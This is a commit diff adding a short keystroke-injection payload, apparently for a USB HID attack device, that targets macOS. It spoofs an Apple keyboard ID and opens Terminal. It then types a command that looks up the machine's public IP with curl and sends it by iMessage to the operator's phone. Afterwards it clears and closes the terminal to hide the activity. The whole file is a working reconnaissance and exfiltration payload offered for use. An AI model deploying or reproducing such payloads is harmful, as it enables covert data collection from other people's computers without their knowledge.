Added I.P. address to Iphone
This commit is contained in:
@@ -0,0 +1,26 @@
|
||||
REM This script uses Mac Terminals ifconfig.me command to do a PUBLIC I.P. lookup
|
||||
REM Then sends the I.p. to your phone via text message
|
||||
REM Replace 'ENTER PHONE NUMBER HERE' with your actual Phone number
|
||||
|
||||
|
||||
REM Title: Public I.P. to Iphone
|
||||
REM Author: Narsty
|
||||
REM Target: MacOS
|
||||
REM Version: 1.0
|
||||
REM Category: Recon
|
||||
|
||||
ID 05ac:021e Apple:Keyboard
|
||||
DELAY 500
|
||||
GUI SPACE
|
||||
DELAY 500
|
||||
STRING terminal
|
||||
DELAY 1000
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING x=$(curl -s ifconfig.me/ip); osascript -e 'tell application "Messages" to send "'$x'" to buddy "ENTER PHONE NUMBER HERE"'
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 4000
|
||||
GUI k
|
||||
DELAY 250
|
||||
GUI w
|
||||
Reference in New Issue
Block a user